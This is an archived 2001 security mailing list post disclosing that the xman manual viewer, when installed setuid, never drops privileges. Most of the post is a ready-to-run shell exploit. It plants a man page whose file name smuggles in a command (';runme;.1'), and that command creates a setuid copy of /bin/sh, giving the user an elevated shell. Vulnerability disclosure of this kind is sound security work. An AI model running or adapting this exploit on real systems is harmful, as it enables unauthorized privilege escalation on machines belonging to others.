xman doesn't drop privileges anywheres in the program. but, does support suid installation. so, exploiting via a system call is much easier than the buffer overflow in MANPATH, mentioned in another bugtraq posting. here is an example of such an exploitation possibility: -- xxman.sh -- #!/bin/sh # example of xman exploitation. xman # supports privileges. but, never # drops them. # Vade79 -> v9at_private -> realhalo.org. MANPATH=~/xmantest/ mkdir -p ~/xmantest/man1 cd ~/xmantest/man1 touch ';runme;.1' cat << EOF >~/xmantest/runme #!/bin/sh cp /bin/sh ~/xmansh chown `id -u` ~/xmansh chmod 4755 ~/xmansh EOF chmod 755 ~/xmantest/runme echo "click the ';runme;' selection," \ "exit. then, check for ~/xmansh." xman -bothshown -notopbox rm -rf ~/xmantest -- xxman.sh -- Vade79 -> v9at_private -> realhalo.org.
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:54:48 PDT